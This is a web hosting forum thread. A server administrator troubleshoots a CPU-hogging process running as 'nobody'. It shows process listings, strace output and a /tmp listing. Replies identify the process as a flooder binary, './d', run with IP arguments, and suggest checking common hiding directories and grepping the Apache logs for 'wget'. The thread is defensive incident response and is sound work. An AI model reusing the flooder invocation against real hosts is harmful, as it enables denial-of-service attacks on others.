Hi I just found out my cpu jump just went up realy high and I have this running but I dont know what it is since it says nobody.

User Domain %CPU %MEM Mysql Processes
nobody 78.74 0.28 0.0
Top Process %CPU 76.5 [httpd]
Top Process %CPU 76.4 [httpd]
Top Process %CPU 76.3 [httpd]

I dont think thats my normal httpd server yet im not sure, and since it says nobody could it be email or something? Should I go ahead and kill this?


EDIT

I get this threw cpanel

Pid Owner Priority Cpu % Mem % Command
26260 nobody 0 79.0 0.1 [httpd]

all of a sudden changed to

Pid Owner Priority Cpu % Mem % Command
27672 nobody 0 53.5 0.0 ./d64.225.154.34064.225.154.1

Process 27672 attached - interrupt to quit
send(4, "0123456789", 10, 0) = 10
send(4, "0123456789", 10, 0) = 10
send(4, "0123456789", 10, 0) = 10
Just keeps going.

*Shakes head*

Im getting other stuff now.

Pid Owner Priority Cpu % Mem % Command
27950 root 0 26.4 0.0 strace-p27672
27806 root 0 6.4 0.2 whostmgrd - serving 24.69.255.246
27672 nobody 0 5.0 0.0 ./d64.225.154.34064.225.154.1

Man my usualy php scripts, the ones that are at 0.050 execution time are up to .200

Also I cant kill this process.

PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
27672 nobody 19 0 428 428 372 R 53.1 0.0 10:00 0 d

Problem solved.

I took a guess and made some tweeks then took a big guess and banned ./d "64.225.154.34" 0 "64.225.154.1"

If anyone knows that this is please let me know.

Sorry to post again but im still having a problem with this, just not as bad now.

I cant seem to kill this. I do top k 27672 y or kill 27672 and im having no luck with some strange file called d

The top things I have to deal with are.

PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND

2203 root 14 0 452 448 380 R 56.6 0.0 3:21 0 strace
2192 root 12 0 6876 6876 6220 S 18.2 0.6 0:51 0 cpsrvd
27672 nobody 11 0 428 428 372 T 14.4 0.0 21:40 0 d

Im going to bump this, I still have this nasty little app running and I get these messages all the time.

IMPORTANT: Do not ignore this email.
This is cPanel stats runner on fireball.1337age.com!
While processing the log files for user mushir, the cpu has been
maxed out for more then a 6 hour period. The current load/uptime line on the server at the time of
this email is
13:55:49 up 95 days, 21:21, 0 users, load average: 1.75, 1.79, 1.77

Bro it looks like your server is hacked

./d "64.225.154.34" 0 "64.225.154.1"

looks like a script used to flood things. It also should not be running as nobody.

any ideas on how they got in etc and why it only eats cpu and no memory whats so ever?

Since its running as nobody I am gussing you have some scripts on your server that were exploited. Its very common to see flooders using only cpu. What kernel version are you running, they could have even rooted you, in that case i would recommend getting an os reinstall and securing the box properly the first time.

Could I possibly talk to you on msn or aim for 5 mins?

Not right now.

What if I hired you for a hour or twos work?

I found the bastard, its been chmoded and is green in shell.

It was in /tmp

This is all that shows up in tmp. Should I just do a rm -r on this file?

./ sess_4f27befe7ac7eaf8116ba082da8092b7
../ sess_5e7171110a88ebb9bc541a10fc3353d0
cmdtemp sess_6671500920a1ca97370b10536a783e58
cpanel.TMP.EbC4lHzok9m_P6v4 sess_6c831ab8dfab1792ca0c5514f64e0e12
cpanel.TMP.T2lZxD2xkx8k4VLs sess_7c4986752ef9cc70d5279d2c6688dccd
d* sess_841fb8db6128645902b942cd5fdc11eb
dementri-session-0.353570155191363 sess_858b8878987eace87bb5e96b02719a0a
.egg2 sess_898fd2ca612eb135a7b98f4d004ccc3b
ffw-session-0.962469359018968 sess_8d0abfd9265b90cf3029ca23c3b25672
lost+found/ sess_96ca4127c687c94ac9015eecf48f9b84
michael-session-0.834318560172932 sess_b26c66baab42567d8f07382d56b3df01
mysql.sock@ sess_bde926e6f4d821981aff937bc14e454d
nobody-session-0.855426529745699 sess_c6ae27a52ce617c7a534c23f01c3e203
pdnick-session-0.842975735056342 sess_d2e0785c131e73801b3212e703f7cc86
rep-session-0.102435587064491 sess_d4a08300b2971c8bd68ce2bc31bac03a
sess_01aba3abe2b58792f9be395ba067ceac sess_dba0d922fbf943fa584d0a1dea20e775
sess_05c9d31f55b7389bd2e9ec0f26e05d19 sess_e02bb3c3158ff4d3c21646b10e61f673
sess_0650b277df6330fba3687a3e0d286307 sess_e851db7990b8c2cdddfaad357b5f585e
sess_07e94cba60640daf23de57f1b4be7645 sess_f78bcfffa95dc2ec250ea485ac37badf
sess_0bb530f067fad2cbe5d2fca8ef992f8e sess_fb60a803030c3386b97e014040afca4b
sess_0c7b19d426bdfe4209c25bc2a5a2bddf shadoz-session-0.669295548551844
sess_21086d1079a73d83bd8574e7bfd25353 .s.PGSQL.5432=
sess_219252fdfaab7cec8d0052c283c76b6d .s.PGSQL.5432.lock
sess_2dfac0e3f7d4a5d680fdc714539035e2 thisshou-session-0.965189843761863
sess_3fd8795c94b486d3efac94efedb4fc32 xpm.h
sess_405f2f5ed1f4bb1522234810db269ead zol-session-0.339349759134592
sess_4a1f6423b6e7633e93255dc318260208

OH My!

Its gone for now, thanks to those who replied or pmed me.

It will be back if you dont find the cause of it. Dont forget to check:

/var/tmp
/tmp
/dev/shm
/usr/local/apache/proxy
/var/spool/mail
/var/spool/vbox

which are other common hiding places. Also do this:


cd /usr/local/apache/domlogs
grep "wget" *

to try to find the "exploited" website.